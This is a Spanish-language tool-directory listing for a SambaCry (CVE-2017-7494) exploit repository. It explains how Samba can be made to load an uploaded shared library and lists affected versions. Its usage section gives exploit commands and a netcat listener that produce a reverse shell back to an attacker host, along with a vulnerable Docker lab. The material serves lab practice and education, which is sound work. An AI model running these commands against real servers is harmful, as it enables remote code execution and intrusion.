Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/yonliud/cve-2017-7494
Análisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónLabs y Práctica
GitHubyonliud/cve-2017-7494

CVE-2017-7494

Explicación y demostración de explotación de SambaCry

Ver Repositorio
22hace 26 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit SambaCry (CVE-2017-7494)

CVE-2017-7494/SambaCry permite a usuarios autenticados subir una biblioteca compartida a una carpeta escribible y realizar un ataque de ejecución utilizando las bibliotecas subidas.

Explicación de la vulnerabilidad

SambaCry es una vulnerabilidad de validación de rutas en la forma en que Samba maneja las solicitudes de named pipes. Normalmente, esas tuberías se utilizan para permitir que los programas se comuniquen entre sí leyendo y escribiendo datos a través de un canal con formato de archivo.

Cuando Samba recibe un nombre de tubería desconocido, las versiones vulnerables pueden tratarlo como el nombre de un módulo cargable dinámicamente. Esos módulos suelen ser bibliotecas .so legítimas instaladas por el administrador.

La vulnerabilidad permite a un cliente proporcionar una ruta absoluta del sistema de archivos en lugar de un módulo normal o un nombre de tubería. Samba no restringe adecuadamente esta ruta y puede efectivamente ejecutar: dlopen("/data/example.so", ...);.

Cargar una biblioteca compartida ejecuta su código de inicialización. Por lo tanto, un atacante que pueda subir un archivo .so malicioso a una ubicación escribible puede hacer que el servicio Samba lo cargue, resultando en ejecución remota de código.

Demostración

https://github.com/user-attachments/assets/270c6725-708d-4e72-996a-b6c40e77f010

Uso

  1. Inicializa un listener:
root@kitploit:~
nc -lvnp 4444
  1. Ejecuta el proceso completo
root@kitploit:~
python3 exploit.py --url //127.0.0.1/data --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --lhost 172.26.242.223 --lport 4444 --remote-path /data/payload.so

Para ejecutar un payload ya subido:

root@kitploit:~
python3 exploit.py --stages trigger --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --remote-path /data/payload.so
  1. En la terminal del listener. Debería aparecer una shell.

Entorno de laboratorio

Usa el docker-compose.yml ya preparado para inicializar el laboratorio vulnerable.

root@kitploit:~
docker compose up -d

El laboratorio usa Samba 4.5.9, que es vulnerable a esta vulnerabilidad.

Versiones afectadas

3.5.0 - 4.4.13 4.5.0 - 4.5.9 4.6.0 - 4.6.3

Descargar herramienta